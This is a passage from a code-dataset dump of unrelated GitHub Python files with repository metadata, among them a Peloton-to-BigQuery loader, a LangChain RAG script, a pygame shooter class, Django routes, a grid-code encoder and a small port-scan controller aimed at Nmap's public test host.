peloton_user.PelotonUser(USERNAME, PASSWORD)\n\n\n# %%\ntable_id = f'{GCP_PROJECT_ID}.{BIGQUERY_DATASET}.users'\n\njob = client.load_table_from_dataframe(user.to_df(), table_id, job_config=user.get_bigquery_job_config())\n\njob.result()\n\n# %% [markdown]\n# # Workouts\n# Here we retrieve all workout ids for the user, workout metadata, performance graphs that include heart rate data, and send to a table in BigQuery.\n\n# %%\n# retrieve all workout ids\nworkout_ids = user.get_workout_ids()\n\n# create workout objects\nworkouts = [peloton_workout.PelotonWorkout(user, workout_id) for workout_id in workout_ids]\n\n# get workout summaries\nsummaries = [workout.get_workout_summary() for workout in workouts]\n\n# get workout details\ndetails = [workout.get_workout_details() for workout in workouts]\n\n\n# %%\n# send workout data to BigQuery\n\ntable_id = f'{GCP_PROJECT_ID}.{BIGQUERY_DATASET}.workouts'\n\npayload = pd.concat([workout.to_df() for workout in workouts])\n\njob = client.load_table_from_dataframe(payload, table_id, job_config=workouts[0].get_bigquery_job_config())\n\njob.result()\n\n\n# %%\n# send performance graph data to BigQuery\n\n# table_id = f'{BIGQUERY_DATASET}.performance_graphs'\n\n# job_config = bigquery.LoadJobConfig(\n# schema=[\n# bigquery.SchemaField('workout_id', 'STRING'),\n# bigquery.SchemaField('display_name', 'STRING'),\n# bigquery.SchemaField('range', 'STRING'),\n# bigquery.SchemaField('minimum_value', 'INTEGER'),\n# bigquery.SchemaField('maximum_value', 'INTEGER'),\n# bigquery.SchemaField('duration_seconds', 'INTEGER'),\n# ],\n# write_disposition='WRITE_TRUNCATE'\n# )\n\n# job = client.load_table_from_dataframe(performance_graph_df, table_id, job_config=job_config)\n\n# job.result()\n\n# %% [markdown]\n# # Rides\n# Here we retrieve class data for the class taken during the workout.\n\n# %%\n# pull rides data for list of unique ride ids\nride_ids = [workout.ride_id for workout in workouts]\nunique_ride_ids = list(dict.fromkeys(ride_ids))\n\n# create objects\nrides = [peloton_ride.PelotonRide(user, ride_id) for ride_id in unique_ride_ids]\n\n# fetch all possible ride types\nride_types = rides[0].get_ride_types()\n\nfor ride in rides:\n ride_type = next((ride_type for ride_type in ride_types if ride_type['id'] == ride.ride_type_id), None)\n ride.ride_type_display_name = ride_type['display_name']\n\n\n# %%\ntable_id = f'{GCP_PROJECT_ID}.{BIGQUERY_DATASET}.rides'\n\npayload = pd.concat([ride.to_df() for ride in rides])\n\njob = client.load_table_from_dataframe(payload, table_id, job_config=rides[0].get_bigquery_job_config())\n\njob.result()\n\n# %% [markdown]\n# # Instructors\n\n# %%\ninstructor_ids = [ride.instructor_id for ride in rides]\nunique_instructor_ids = list(dict.fromkeys(instructor_ids))\n\ninstructors = [peloton_instructor.PelotonInstructor(instructor_id) for instructor_id in unique_instructor_ids if instructor_id is not None]\n\n\n# %%\ntable_id = f'{GCP_PROJECT_ID}.{BIGQUERY_DATASET}.instructors'\n\npayload = pd.concat([instructor.to_df() for instructor in instructors])\n\njob = client.load_table_from_dataframe(payload, table_id, job_config=instructors[0].get_bigquery_job_config())\n\njob.result()\n\n\n# %%\n\n\n\n","repo_name":"xmarcosx/peloton","sub_path":"peloton/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4173,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"4937923104","text":"\n\"\"\"\n2D bars for binned events\n------------------------------------------\nThis is an example of plotting event count with binned stacking by back-azimuth and ray-parameters.\n\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.colorbar import ColorbarBase\nfrom matplotlib.colors import Normalize\nfrom obspy.imaging.cm import get_cmap\n\ndef plot(evts_file='data/binned_evts.txt'):\n evts_stack = np.loadtxt(evts_file)\n cmap = get_cmap('YlGnBu')\n dh = 0.004\n dww = 30\n rayp_bins = np.arange(0.04, 0.08+dh, dh).astype(float)\n baz_bins = np.arange(0., 360.+dww, dww).astype(float)+15\n N = baz_bins.size\n dw = np.mean(np.diff(np.linspace(0, 2*np.pi, N)))\n N -= 1\n N2 = rayp_bins.size\n N2 -= 1\n hist = np.zeros([N, N2])\n for i, evt in enumerate(evts_stack):\n idx_ba = np.where(baz_bins == evt[0])[0]\n idx_ra = np.where((rayp_bins > evt[1]-0.0005) & (rayp_bins < evt[1]+0.0005))[0]\n hist[idx_ba, idx_ra] = evt[2]\n fig = plt.figure(figsize=(7, 7))\n cax = fig.add_axes([0.1, 0.15, 0.05, 0.5])\n ax = fig.add_axes([0.30, 0.1, 0.6, 0.6], polar=True)\n ax.set_theta_direction(-1)\n ax.set_theta_zero_location(\"N\")\n for i, row in enumerate(hist):\n bars = ax.bar(x=(i * dw) * np.ones(N2)+2*np.pi*15/360,\n height=dh * np.ones(N2),\n width=dw, bottom=dh * np.arange(N2)+0.04,\n color=cmap(row / hist.max()))\n ax.set_xticks(np.arange(0, 2*np.pi, 2*np.pi*30/360))\n ax.set_xticklabels(['{}$^\\circ$'.format(v) for v in np.arange(0, 360, 30)])\n ax.set_ylim(0.036, 0.08)\n ax.set_yticks(rayp_bins)\n [i.set_color('grey') for i in ax.get_yticklabels()]\n ax.set_rlabel_position(230)\n ColorbarBase(cax, cmap=cmap,\n norm=Normalize(vmin=hist.min(), vmax=hist.max()))\n cax.set_ylabel('Number of PRFs')\n cax.grid(axis='y')\n plt.show()\n\n\nif __name__ == '__main__':\n plot()\n","repo_name":"xumi1993/docs.post","sub_path":"source/examples/matplotlib/evts_stack.py","file_name":"evts_stack.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"852165586","text":"import torch\n\nfrom textwrap import fill\nfrom IPython.display import Markdown, display\n\nfrom langchain.prompts.chat import (\n ChatPromptTemplate,\n HumanMessagePromptTemplate,\n SystemMessagePromptTemplate,\n )\n\nfrom langchain import PromptTemplate\nfrom langchain import HuggingFacePipeline\n\nfrom langchain.document_loaders import PyMuPDFLoader\nfrom langchain.vectorstores import Chroma\nfrom langchain.schema import AIMessage, HumanMessage\nfrom langchain.memory import ConversationBufferMemory\nfrom langchain.embeddings import HuggingFaceEmbeddings\nfrom langchain.text_splitter import RecursiveCharacterTextSplitter\nfrom langchain.document_loaders import UnstructuredMarkdownLoader, UnstructuredURLLoader\nfrom langchain.chains import LLMChain, SimpleSequentialChain, RetrievalQA, ConversationalRetrievalChain\n\nfrom transformers import BitsAndBytesConfig, AutoModelForCausalLM, AutoTokenizer, GenerationConfig, pipeline\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\nMODEL_NAME = \"mistralai/Mistral-7B-Instruct-v0.1\"\n\nquantization_config = BitsAndBytesConfig(\n load_in_4bit=True,\n bnb_4bit_compute_dtype=torch.float16,\n bnb_4bit_quant_type=\"nf4\",\n bnb_4bit_use_double_quant=True,\n)\n\ntokenizer = AutoTokenizer.from_pretrained(MODEL_NAME, use_fast=True)\ntokenizer.pad_token = tokenizer.eos_token\n\nmodel = AutoModelForCausalLM.from_pretrained(\n MODEL_NAME, torch_dtype=torch.float16,\n trust_remote_code=True,\n device_map=\"auto\",\n quantization_config=quantization_config\n)\n\ngeneration_config = GenerationConfig.from_pretrained(MODEL_NAME)\ngeneration_config.max_new_tokens = 1024\ngeneration_config.temperature = 0.0001\ngeneration_config.top_p = 0.95\ngeneration_config.do_sample = True\ngeneration_config.repetition_penalty = 1.15\n\npipeline = pipeline(\n \"text-generation\",\n model=model,\n tokenizer=tokenizer,\n return_full_text=True,\n generation_config=generation_config,\n)\n\nllm = HuggingFacePipeline(\n pipeline=pipeline,\n)\n\npdfLoader = PyMuPDFLoader('../documents/apple-10-k.pdf')\ndocuments = pdfLoader.load()\n\ntext_splitter = RecursiveCharacterTextSplitter(chunk_size=2000, chunk_overlap=500)\ntexts_chunks = text_splitter.split_documents(documents)\n\n# embeddings = HuggingFaceEmbeddings(model_name='sentence-transformers/all-MiniLM-L6-v2',\n# model_kwargs={'device': 'cpu'})\n\ndb = Chroma.from_documents(texts_chunks, HuggingFaceEmbeddings(), persist_directory=\"db\")\n\n# template = \"\"\"\n# [INST] <>\n# Act as an assistant. Use the following information to answer the question at the end.\n# <>\n\n# {context}\n\n# {question} [/INST]\n# \"\"\"\n\ntemplate = \"\"\"Use the following pieces of information to answer the user's question.\nIf you don't know the answer, just say that you don't know, don't try to make up an answer.\nContext: {context}\nQuestion: {question}\nOnly return the helpful answer regarding user question.\nHelpful answer:\n\"\"\"\n\nprompt = PromptTemplate(template=template, input_variables=[\"context\", \"question\"])\n\nqa_chain = RetrievalQA.from_chain_type(\n llm=llm,\n chain_type=\"stuff\",\n retriever=db.as_retriever(search_kwargs={\"k\": 2}),\n return_source_documents=True,\n chain_type_kwargs={\"prompt\": prompt},\n)\n\n\nquery = \"Is there any legal proceedings? If yes, what companies are they related to?\"\nresult_ = qa_chain(\n query\n)\nresult = result_[\"result\"].strip()\n\n\nprint(f\"{query}\")\nprint(f\"

{result}

\")","repo_name":"dawidkubicki/rag-applications","sub_path":"mistral_chromadb/normal_with_quantization_config_model.py","file_name":"normal_with_quantization_config_model.py","file_ext":"py","file_size_in_byte":3409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4823799944","text":"\n# file = open('test','w',encoding='utf-8')\n#\n# file.write('111\\n')\n# file.write('aaa\\n')\n#\n# file.close()\n#\n# with open('test','a',encoding='utf-8') as f:\n# f.write('dad')\n# f.write('mom')\n# f.write('child')\n\n# with open('fileoperation.py','r',encoding='utf-8') as fo:\n# data = fo.read()\n# print(data)\n\n# fb = open('fileoperation.py','rb')\n# data = fb.read()\n# print(data.decode('utf-8'))\n\nfb = open('test','ab')\nfb.write('\\nMR.SherLock'.encode('utf-8'))\nfb.write(bytes('\\nMRS.DOCTOR',encoding='utf-8'))\nfb.close()","repo_name":"huotong1212/mylearnpy","sub_path":"code/day01/fileoperation.py","file_name":"fileoperation.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73054003894","text":"from db.run_sql import run_sql\n\nfrom models.player import Player\nfrom models.training import Training\nfrom models.player_training import Player_Training\n\nimport repositories.player_repository as player_repository\nimport repositories.training_repository as training_repository\nimport repositories.player_training_repository as player_training_repository\n\ndef save(player_training):\n sql = \"INSERT INTO players_trainings (player_id, training_id, comments) VALUES (%s, %s, %s) RETURNING id\"\n values = [player_training.player.id, player_training.training.id, player_training.comments]\n results = run_sql (sql, values)\n player_training.id = results [0]['id']\n return player_training\n\ndef select(id):\n player_training = None\n sql = \"SELECT * FROM players_trainings WHERE id = %s\"\n values = [id]\n result = run_sql(sql, values)[0]\n \n if result is not None:\n player_training = Player_Training(result['player_id'], result['training_id'], result['comments'])\n return player_training\n\ndef select_all():\n player_trainings = []\n \n sql = 'SELECT * FROM players_trainings'\n results = run_sql(sql)\n \n for row in results:\n player = player_repository.select(row['player_id'])\n training = training_repository.select(row['training_id'])\n player_training = Player_Training(player, training, row['comments'], row['id'])\n player_trainings.append(player_training)\n return player_trainings\n\ndef training(player_training):\n sql = 'SELECT * FROM trainings WHERE id = %s'\n values = [player_training.training.id]\n results = run_sql(sql, values)[0]\n training = Training(results['training_name'], results['time'], results['duration'], results['intensity'], results['id'])\n\n return training\n\ndef player(player_training):\n sql = 'SELECT * FROM players WHERE id = %s'\n values = [player_training.player.id]\n results = run_sql(sql, values)[0]\n player = Player(results['name'], results['shirt_no'], results['position'], results['fatigue'], results['id'])\n return player\n\ndef delete_all():\n sql = \"DELETE FROM players_trainings\"\n run_sql(sql)\n \ndef delete(id):\n sql = \"DELETE FROM players_trainings WHERE id = %s\"\n values =[id]\n run_sql(sql, values)\n\ndef raise_fatigue(id):\n sql = \"UPDATE players SET fatigue = %s WHERE id = %s\"\n values = [player.fatigue, player.id]\n run_sql(sql, values)","repo_name":"dieeer/armory","sub_path":"repositories/player_training_repository.py","file_name":"player_training_repository.py","file_ext":"py","file_size_in_byte":2399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33194535752","text":"import logging\n\nimport pulsectl\n\nfrom taqtile.widgets.togglebtn import ToggleButton\nfrom libqtile import hook\nfrom pprint import pformat\nfrom libqtile import qtile\n\nlogger = logging.getLogger(__name__)\n\n\nclass VoiceInputStatusWidget(ToggleButton):\n def _check_state(self):\n found = False\n with pulsectl.Pulse(\"voice-input-status-widget\") as pulse:\n # Get a list of all source outputs (recording streams)\n source_outputs = pulse.source_output_list()\n sources = pulse.source_list()\n\n # Create a dictionary of sources with their index as the key\n sources_dict = {source.index: source for source in sources}\n\n # Print information about each source output with an active parent source\n for source_output in source_outputs:\n parent_source = sources_dict.get(source_output.source)\n\n if parent_source and parent_source.state == \"running\":\n app_name = source_output.proplist.get(\n \"application.name\", \"Unknown\"\n )\n app_id = source_output.proplist.get(\n \"application.id\", \"Unknown\"\n )\n if app_id == \"org.PulseAudio.pavucontrol\":\n continue\n return True\n\n # print(f\"App name: {app_name}\")\n # print(f\"Source output index: {source_output.index}\")\n # print(f\"Source index: {source_output.source}\")\n # print(f\"Volume: {source_output.volume}\")\n # print(f\"Mute: {source_output.mute}\")\n # print(f\"Sample spec: {source_output.sample_spec}\")\n # print(f\"Proplist: {source_output.proplist}\")\n # print(\"=\" * 40)\n return found\n\n def check_state(self):\n self.active = self._check_state()\n return super().check_state()\n","repo_name":"jagguli/TAQtile","sub_path":"taqtile/widgets/live.py","file_name":"live.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"12959104895","text":"from view.Console import Console\nfrom model.PortScanner import PortScanner\n\n\nclass Controller:\n\n def __init__(self):\n self.isRunnig = True\n\n def Init(self):\n mainView = Console()\n portScanner = PortScanner(\"scanme.nmap.org\")\n\n print(\"PortScanner is Running now...\")\n\n for port in range (1, 128):\n result = portScanner.StartScan(port)\n mainView.PrintBooleanRow(\"Port : \" + str(result['port']), (result['result'] == 0), [\"OPEN\", \"CLOSE\"])\n\n","repo_name":"mae1995/scanner","sub_path":"control/Controller.py","file_name":"Controller.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14650377920","text":"import math\r\nimport pygame\r\n\r\nclass Actor:\r\n def __init__(self, *args):\r\n self.id = args[0] # ID\r\n self.shape = args[1] # 모양\r\n self.hp = args[2] # 체력\r\n self.power = args[3] # 파워\r\n self.speed = args[4] # 스피드\r\n self.shotDelay = args[5] # 총알 딜레이\r\n # 초기화\r\n self.xPos = 1.0 # X좌표\r\n self.yPos = 1.0 # Y좌표\r\n self.angle = 0.0 # 움직임 각도\r\n \r\n self.width = self.shape.get_rect().size[0] # 가로 크기\r\n self.height = self.shape.get_rect().size[1] # 세로 크기\r\n \r\n self.aliveTimer = pygame.time.get_ticks() # 살아 있는 시간\r\n self.shotTimer = pygame.time.get_ticks() # 총알 딜레이 시간\r\n self.damageTimer = pygame.time.get_ticks() # 데미지 딜레이시간\r\n \r\n self.moveTimer = pygame.time.get_ticks()\r\n \r\n self.startPosX = 0\r\n self.startPosY = 0\r\n \r\n self.tag = \"None\"\r\n \r\n self.isAlive = False\r\n \r\n self.currentHp = self.hp\r\n \r\n self.pattern = 0\r\n self.invincibility = False\r\n \r\n\r\n def ChangeShotDelay(self, delay):\r\n self.shotDelay = delay\r\n\r\n def ShotDelay(self):\r\n \r\n if self.isAlive == True:\r\n if (pygame.time.get_ticks() - self.shotTimer) /1000 > self.shotDelay:\r\n self.shotTimer = pygame.time.get_ticks()\r\n return True\r\n \r\n return False\r\n \r\n def ChangeScale(self, width, height):\r\n self.shape = pygame.transform.scale(self.shape,(width, height))\r\n self.width = width\r\n self.height = height\r\n \r\n def ChangeRotation(self, renderAngle):\r\n self.shape = pygame.transform.rotate(self.shape, renderAngle)\r\n \r\n def MoveSpawn(self, xPos, yPos, speed, angle, tag):\r\n self.xPos = xPos\r\n self.yPos = yPos\r\n self.speed = speed\r\n self.angle = angle\r\n self.tag = tag\r\n \r\n self.currentHp = self.hp\r\n self.pattern = 0\r\n self.isAlive = True\r\n \r\n def AppearSpawn(self, xPos, yPos, tag):\r\n self.xPos = xPos\r\n self.yPos = yPos\r\n self.speed = 0\r\n self.tag = tag\r\n \r\n self.currentHp = self.hp\r\n self.pattern = 0\r\n self.isAlive = True\r\n\r\n def MoveDestination(self, xPos, yPos, play_timer):\r\n \r\n timer = (pygame.time.get_ticks() - self.moveTimer) / 1000\r\n \r\n if timer > play_timer - 0.02:\r\n self.moveTimer = pygame.time.get_ticks()\r\n else:\r\n targetVec = pygame.Vector2(xPos, yPos)\r\n playerVec = pygame.Vector2(self.startPosX, self.startPosY)\r\n \r\n resultVec = pygame.Vector2.lerp(playerVec,targetVec, timer/play_timer)\r\n \r\n self.xPos = resultVec.x\r\n self.yPos = resultVec.y\r\n \r\n if timer/play_timer >= 0.98:\r\n self.moveTimer = pygame.time.get_ticks()\r\n self.startPosX = self.xPos\r\n self.startPosY = self.yPos\r\n return True\r\n \r\n return False\r\n \r\n def Move(self):\r\n if self.isAlive == True:\r\n if self.pattern == 0:\r\n rads = math.radians(self.angle)\r\n \r\n self.xPos += (math.cos(rads) * self.speed)\r\n self.yPos += (math.sin(rads) * self.speed)\r\n \r\n if self.xPos < -300 or \\\r\n self.xPos > 680 or \\\r\n self.yPos < -300 or \\\r\n self.yPos > 840:\r\n self.isAlive = False\r\n \r\n def Hit(self, damage):\r\n \r\n self.currentHp -= damage\r\n \r\n if self.currentHp < 0:\r\n self.isAlive = False\r\n return True\r\n \r\n return False \r\n \r\n \r\n \r\nclass Enemy(Actor):\r\n def __init__(self, *args):\r\n super().__init__(*args)\r\n \r\n self.tag = \"Enemy\"\r\n \r\nclass Player(Actor):\r\n def __init__(self, *args):\r\n super().__init__(*args)\r\n self.profile = args[6]\r\n self.initLife = args[7]\r\n self.initBomber = args[8]\r\n self.shieldAlive = False\r\n \r\n self.tag = \"Player\"\r\n \r\n def SetShield(self, state):\r\n self.shieldAlive = state\r\n \r\n \r\n \r\nclass Boss(Actor):\r\n def __init__(self, *args):\r\n super().__init__(*args)\r\n \r\n self.tag = \"Boss\"","repo_name":"ReDocuSpace/AIClass","sub_path":"Python/Python_Project/ShootingGame/actor.py","file_name":"actor.py","file_ext":"py","file_size_in_byte":4609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2876022053","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('list/', views.list, name=\"list\"), # 레스토랑의 리스트를 보여주는 화면이다. /third/list/ 접속 경로를 의미한다.\n path('create/', views.create, name='restaurant-create'),\n path('update/', views.update, name='restaurant-update'),\n\n # path('delete/', views.delete, name='restaurant-delete'),\n path('restaurant//delete/', views.delete, name='restaurant-delete'),\n\n # path('detail/', views.detail, name='restaurant-detail'),\n path('restaurant//', views.detail, name='restaurant-detail'), # detail 의 주소를 패스파라미터(쿼리파라미터 말고)를 사용할 수 있도록 재정의함.\n\n path('restaurant//review/create/', views.review_create, name='review-create'),\n path('restaurant//review/delete/', views.review_delete, name='review-delete'),\n path('review/list/', views.review_list, name='review-list'),\n]\n","repo_name":"tkguswls1106/first-django","sub_path":"third/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"16258699333","text":"# coding: UTF-8\r\n# Coder for Japanese iarea grid code.\r\n# NTT DoCoMo's Open iArea in Japan use a gridcode which is very similar to\r\n# JIS X 0410, but absolutely different in detail.\r\n\r\ndef _encode_i2c(lat,lon,basebits):\r\n\tt=[]\r\n\tfor i in range(basebits-3):\r\n\t\tt.append((lat&1)*2 + (lon&1))\r\n\t\tlat = lat>>1\r\n\t\tlon = lon>>1\r\n\t\r\n\tif basebits>=3:\r\n\t\tt.append(lon&7)\r\n\t\tt.append(lat&7)\r\n\t\tlat = lat>>3\r\n\t\tlon = lon>>3\r\n\t\r\n\tt.append(lon)\r\n\tt.append(lat)\r\n\tt.reverse()\r\n\treturn ''.join([str(i) for i in t])\r\n\r\ndef encode(lat, lon):\r\n\tif lat<7 or lon<100:\r\n\t\traise Exception('Unsupported location')\r\n\t\r\n\tbasebits = 8\r\n\treturn _encode_i2c(int(lat * (1<6:\r\n\t\tfor i in gridcode[6:]:\r\n\t\t\tlat = (lat<<1) + int(int(i)/2)\r\n\t\t\tlon = (lon<<1) + int(i)%2\r\n\t\t\tbase = base<<1\r\n\t\t\tbasebits += 1\r\n\t\r\n\tif len(gridcode)>4:\r\n\t\tlat = int(gridcode[4:5])*base + lat\r\n\t\tlon = int(gridcode[5:6])*base + lon\r\n\t\tbase = base<<3\r\n\t\tbasebits += 3\r\n\t\r\n\tlat = int(gridcode[0:2])*base + lat\r\n\tlon = int(gridcode[2:4])*base + lon\r\n\t\r\n\treturn (lat, lon, basebits)\r\n\r\ndef decode_sw(gridcode, delta=False):\r\n\tlat, lon, basebits = _decode_c2i(gridcode)\r\n\t\r\n\tif delta:\r\n\t\treturn (float(lat)/(1.5*(1<(90<(100< number_top:\n break\n ranked_document[lKey[0]] = dicSimilarity.get(lKey[0])\n index+=1\n\n print(\"Calculate completely\")\n return [ranked_document, ranked_similarity]\n\ndef score(ranked_document, sKey):\n value = 0\n for rank,document_key in enumerate(ranked_document):\n if sKey.upper() == document_key.upper():\n value = rank/len(ranked_document)\n print(value)\n break\n\n # scoreSum = 0\n # for s in scores:\n # scoreSum += s\n # accuracy = scoreSum / 5\n\n return value","repo_name":"yejoonlee/Journal-Recomadation","sub_path":"Function_NLP/functions_for_w2v.py","file_name":"functions_for_w2v.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74394718134","text":"#!/usr/bin/arch -i386 python2.7\n#\n# Author: Kevin Klues \n\nimport os\nimport re\nimport glob\nimport json\nimport matplotlib\nimport matplotlib as mpl\nmatplotlib.use('Agg')\nfrom pylab import *\nfrom collections import OrderedDict\nimport numpy as np\n\nclass BenchmarkData:\n def __init__(self, config):\n self.files = map(lambda x: os.path.join(config.input_folder, x), next(os.walk(config.input_folder))[2])\n self.data = {}\n map(lambda x: FileData(x, self), self.files)\n\nclass FileData:\n def __init__(self, f, bdata):\n mainpat = re.compile('^main-output$')\n thumbpat = re.compile('^thumbnails-(?P.*)-(?P.*)$')\n blastpat = re.compile('^blast-(?P.*)$')\n\n filename = os.path.basename(f)\n lines = map(lambda x: x.strip(), file(f).readlines())\n\n m = mainpat.match(filename)\n if m != None:\n bdata.data['main'] = ParseMainData(lines, bdata).data\n return\n m = thumbpat.match(filename)\n if m != None:\n lib = m.group('lib')\n td = ParseThroughputData(lines, bdata).data\n bdata.data.setdefault('thumbnails', {})\n bdata.data['thumbnails'].setdefault(lib, [])\n bdata.data['thumbnails'][lib].append(td)\n return\n m = blastpat.match(filename)\n if m != None:\n lib = m.group('lib')\n td = ParseThroughputData(lines, bdata).data\n bdata.data.setdefault('blast', {})\n bdata.data['blast'].setdefault(lib, [])\n bdata.data['blast'][lib].append(td)\n return\n\nclass ParseMainData:\n def __init__(self, lines, bdata):\n self.data = OrderedDict()\n for line in lines:\n if line == \"\":\n continue\n if line[0:15] == 'Configuration: ':\n config = line[15:]\n self.data[config] = {}\n else:\n name,time = map(lambda x: x.strip(), line.split(':'))\n a,t = map(lambda x: x.strip(), name.split('_'))\n self.data[config].setdefault(a, {})\n self.data[config][a].setdefault(t, [])\n self.data[config][a][t].append(float(time))\n if 'starttime' not in self.data[config]:\n self.data[config]['starttime'] = float(time)\n\nclass ParseThroughputData:\n def __init__(self, lines, bdata):\n self.data = []\n for i, line in enumerate(lines):\n sl = map(lambda x: x.strip(), line.split(','))\n self.data.append({\n 'throughput' : float(sl[0].split(' ')[0]),\n 'avg latency' : float(sl[1].split(' ')[0]),\n 'std latency' : float(sl[2].split(' ')[0]),\n 'total requests' : float(sl[3].split(' ')[0]),\n 'interval time' : float(sl[4].split(' ')[0]),\n 'total time' : float(sl[5].split(' ')[0])\n })\n\ndef graph_throughput(bdata, config):\n fig, ax1 = plt.subplots()\n fig.subplots_adjust(hspace=0.3)\n colors = [\"#396AB1\", \"#CC2529\", \"#3E9651\", \"#948B3D\",\n \"#DA7C30\", \"#535154\", \"#922428\"]\n\n labels = OrderedDict([\n ('linux', 'Linux NPTL'),\n ('upthread', 'upthread'),\n ('upthread-lithe', 'upthread-lithe'),\n #('upthread-native-omp', 'upthread with NPTL-based OMP'),\n #('upthread-lithe-native-omp', 'upthread-lithe with NPTL-based OMP'),\n ])\n\n for i, lib in enumerate(labels.keys()):\n starttime = bdata.data['main'][lib]['starttime']\n for j, source in enumerate(['thumbnails', 'blast']):\n launches = bdata.data['main'][lib]['launch'][source]\n time = []\n throughput = []\n latency = []\n for k, data in enumerate(bdata.data[source][lib]):\n newtime = map(lambda x: x['total time'] + launches[k] - starttime, data)\n time += [newtime[0]] + newtime + [newtime[-1]]\n throughput += [0] + map(lambda x: x['throughput'], data) + [0]\n latency += [0] + map(lambda x: x['avg latency'], data) + [0]\n ax = subplot(4, 1, j + 1)\n plot(time, throughput, label=labels[lib], color=colors[i], linewidth=1.2)\n for label in ax.yaxis.get_ticklabels()[::2]:\n label.set_visible(False)\n xlim([0, 1600])\n ax = subplot(4, 1, 2 + j + 1)\n plot(time, latency, label=labels[lib], color=colors[i], linewidth=1.2)\n for label in ax.yaxis.get_ticklabels()[::2]:\n label.set_visible(False)\n xlim([0, 1600])\n\n suptitle('Kweb Throughput and Latency\\nMixing File Requests and Thumbnail Generation', y=1.15, fontsize=20)\n ax = subplot(4, 1, 1)\n title('Thumbnail Request Throughput')\n ylabel('Throughput\\n(Requests / Second)', labelpad=25, fontsize=16)\n ax.yaxis.set_label_coords(-0.13, -0.025)\n xx, locs = xticks()\n xticks(xx, [])\n leg = legend(loc='center', bbox_to_anchor=[0.5, 1.55, 0, 0], ncol=3)\n for legobj in leg.legendHandles:\n legobj.set_linewidth(10.0)\n\n subplot(4, 1, 2)\n title('File Request Throughput')\n xx, locs = xticks()\n xticks(xx, [])\n\n ax = subplot(4, 1, 3)\n title('Thumbnail Request Latency')\n ylabel('Latency (s)', fontsize=16)\n ax.yaxis.set_label_coords(-0.13, -0.025)\n xx, locs = xticks()\n xticks(xx, [])\n yy, locs = yticks()\n ll = ['%.2f' % a for a in yy]\n yticks(yy, ll)\n\n subplot(4, 1, 4)\n title('File Request Latency')\n xlabel('Time (s)', fontsize=16)\n\n figname = config.output_folder + \"/thumbnails-throughput.png\"\n savefig(figname, bbox_inches=\"tight\")\n clf()\n\ndef thumbnails_graphs(parser, args):\n config = lambda:None\n if args.config_file:\n config.__dict__ = json.load(file(args.config_file), object_pairs_hook=OrderedDict)\n else:\n parser.print_help()\n exit(1)\n\n try:\n os.mkdir(config.output_folder)\n except:\n pass\n bdata = BenchmarkData(config)\n graph_throughput(bdata, config)\n\n","repo_name":"klueska/lithe-benchmarks","sub_path":"thumbnails_net/python/thumbnails_graphs.py","file_name":"thumbnails_graphs.py","file_ext":"py","file_size_in_byte":5497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23264016253","text":"from ships import *\n\nscout = {'name': \"Scout\",\n 'hp': 1,\n 'atk': 3,\n 'df': 0,\n 'ship_class': \"E\",\n 'cp_cost': 6,\n 'obj': Scout}\n\nbattlecruiser = {'name':\"BattleCruiser\",\n 'hp': 2,\n 'atk': 5,\n 'df': 1,\n 'ship_class': \"B\",\n 'cp_cost': 15,\n 'obj': BattleCruiser}\n\ncruiser = {'name':\"Cruiser\",\n 'hp': 2,\n 'atk': 4,\n 'df': 1,\n 'ship_class': \"C\",\n 'cp_cost': 12,\n 'obj': Cruiser}\n\ndestroyer = {'name':\"Destroyer\",\n 'hp': 1,\n 'atk': 4,\n 'df': 0,\n 'ship_class': \"D\",\n 'cp_cost': 9,\n 'obj': Destroyer}\n\ndreadnaught = {'name':\"Dreadnaught\",\n 'hp': 3,\n 'atk': 6,\n 'df': 3,\n 'ship_class': \"A\",\n 'cp_cost': 24,\n 'obj': Dreadnaught}\n\nall_ship_infos = [scout, battlecruiser, cruiser, dreadnaught, destroyer]\n\n#{'Scout': 0, 'BattleCruiser': 0, 'Cruiser': 0, 'Destroyer': 0, 'Dreadnaught': 0}","repo_name":"snowthesprite/space-empires","sub_path":"ships/ship_data.py","file_name":"ship_data.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38956324844","text":"\"\"\" Uses a list to group the words from a text file according to\n their length (number of letters). \"\"\"\n\nimport sys # For argv global command line arguments list\n\n\ndef main():\n \"\"\" Group the words by length in a text file. \"\"\"\n if len(sys.argv) < 2: # Did the user not supply a file name?\n print('Usage: python groupwordslist.py ')\n print(' where is the name of a text file.')\n else: # User provided file name\n filename = sys.argv[1]\n groups = [] # Initialize grouping list\n for i in range(20):\n groups.append(set()) # Add new empty set to the list \n with open(filename, 'r') as f: # Open the file for reading\n content = f.read() # Read in content of the entire file\n words = content.split() # Make list of individual words\n for word in words:\n word = word.upper() # Make the word all caps\n # Compute the word's length\n size = len(word)\n groups[size].add(word)\n # Show the groups\n for size, group in enumerate(groups):\n print(size, ':', group)\n\n\nif __name__ == '__main__':\n 